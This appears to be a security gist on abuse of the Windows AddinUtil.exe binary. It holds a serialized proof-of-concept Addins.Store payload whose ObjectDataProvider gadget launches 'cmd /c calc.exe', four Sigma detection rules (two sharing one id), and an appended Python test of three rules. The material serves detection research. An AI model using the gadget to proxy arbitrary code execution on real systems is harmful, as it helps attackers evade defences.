@SILJAEUROPA
Last active April 18, 2024 18:53
Collection of AddinUtil.exe LOLBAS Sigma Signatures and an AddinUtil.exe PoC Payload.
ª» ÿÿÿÿ  ^Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35 BMicrosoft.VisualStudio.Text.Formatting.TextFormattingRunProperties ForegroundBrush  ·<?xml version="1.0" encoding="utf-16"?>
<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
  <ObjectDataProvider.ObjectInstance>
    <sd:Process>
      <sd:Process.StartInfo>
        <sd:ProcessStartInfo Arguments="/c calc.exe" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
      </sd:Process.StartInfo>
    </sd:Process>
  </ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>

title: AddinUtil.exe Execution from Suspicious Directory
id: 74e16e48-667d-4540-893d-e0f100cafc27
status: experimental
description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
references:
    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
    - attack.defense_evasion
    - attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\addinutil.exe'
    filter_64bit:
        Image|startswith: 'C:\Windows\Microsoft.NET\Framework64\'
    filter_32bit:
        Image|startswith: 'C:\Windows\Microsoft.NET\Framework\'
    condition: selection and not 1 of filter*
falsepositives:
    - Unknown
level: medium

title: AddinUtil.exe Execution with Suspicious Command Line
id: 74e16e48-667d-4540-893d-e0f100cafc27
status: experimental
description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon -AddInRoot or -PipelineRoot paths. An adversary may execute AddinUtil.exe with uncommon -AddInRoot/-PipelineRoot paths that point to the adversary's Addins.Store payload.
references:
    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
    - attack.defense_evasion
    - attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\addinutil.exe'
    filter_pipelineroot:
        CommandLine|contains: '-PipelineRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\'
    filter_addinroot:
        CommandLine|contains: '-AddInRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\'
    condition: selection and not 1 of filter*
falsepositives:
    - Unknown
level: medium

title: AddinUtil.exe Network Connection
id: 3f73cf20-daf9-48ec-ac4d-5e996096c9c0
status: experimental
description: Detects network connections made by the Add-In deployment cache updating utility (AddInutil.exe), which could indicate command and control.
references:
    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
    - attack.defense_evasion
    - attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        Image|endswith: '\addinutil.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: AddinUtil.exe with Suspicious Child Process
id: 42e3ad54-a382-4e50-a297-4ee84777bddf
status: experimental
description: Detects suspicious child processes of the Add-In deployment cache updating utility (AddInutil.exe), which could be a sign of abuse of the binary to proxy execution via a custom Addins.Store payload.
references:
    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
    - attack.defense_evasion
    - attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\addinutil.exe'
    filter_werfault_64bit:
        Image|endswith: '\Windows\System32\werfault.exe'
    filter_werfault_32bit:
        Image|endswith: '\Windows\SysWOW64\werfault.exe'
    filter_conhost:
        Image|endswith: '\Windows\System32\conhost.exe'
    condition: selection and not 1 of filter*
falsepositives:
    - Unknown
level: medium
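To check how the `selection and not 1 of filter*` logic of the three process_creation rules above behaves before deploying them, here is an added example (not part of this gist) that re-implements each rule in plain Python and runs it over a few constructed Sysmon-style events; the function names, the `EVENTS` list and every path in it are assumptions made for the example.

```python
"""Added example (not part of the gist): plain-Python re-implementation of the
three process_creation rules above, using Sigma's default case-insensitive
modifiers, run over constructed Sysmon-style events (all values made up)."""

NET_DIRS = ("c:\\windows\\microsoft.net\\framework64\\",
            "c:\\windows\\microsoft.net\\framework\\")
VSTA = "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\"
BENIGN_CHILDREN = ("\\windows\\system32\\werfault.exe",
                   "\\windows\\syswow64\\werfault.exe",
                   "\\windows\\system32\\conhost.exe")

def _is_addinutil(path):
    return path.lower().endswith("\\addinutil.exe")

def suspicious_directory(ev):
    """Rule 1: addinutil.exe not started from either .NET Framework directory."""
    image = ev.get("Image", "")
    return _is_addinutil(image) and not image.lower().startswith(NET_DIRS)

def suspicious_command_line(ev):
    """Rule 2: -AddInRoot/-PipelineRoot not pointing at the default VSTA path."""
    cmd = ev.get("CommandLine", "").lower()
    defaults = ('-pipelineroot:"' + VSTA, '-addinroot:"' + VSTA)
    return _is_addinutil(ev.get("Image", "")) and not any(d in cmd for d in defaults)

def suspicious_child(ev):
    """Rule 4: child of addinutil.exe other than werfault.exe or conhost.exe."""
    image = ev.get("Image", "").lower()
    return _is_addinutil(ev.get("ParentImage", "")) and not image.endswith(BENIGN_CHILDREN)

RULES = {"suspicious_directory": suspicious_directory,
         "suspicious_command_line": suspicious_command_line,
         "suspicious_child": suspicious_child}

# Constructed events: a normal cache update, a copy of the binary in a
# user-writable directory, and two children of the legitimate binary.
EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe",
     "CommandLine": r'AddInUtil.exe -AddInRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\AddIns"'},
    {"Image": r"C:\Users\Public\AddInUtil.exe",
     "CommandLine": r'AddInUtil.exe -AddInRoot:"C:\Users\Public\AddIns"'},
    {"ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe",
     "Image": r"C:\Windows\System32\conhost.exe"},
    {"ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe",
     "Image": r"C:\Windows\System32\cmd.exe"},
]

def evaluate(events):
    """Return (event index, rule name) for every rule that fires on an event."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]
```

Only the second event (binary outside the .NET directories with a non-default -AddInRoot) and the cmd.exe child fire; the normal cache update and the conhost.exe child are absorbed by the filters.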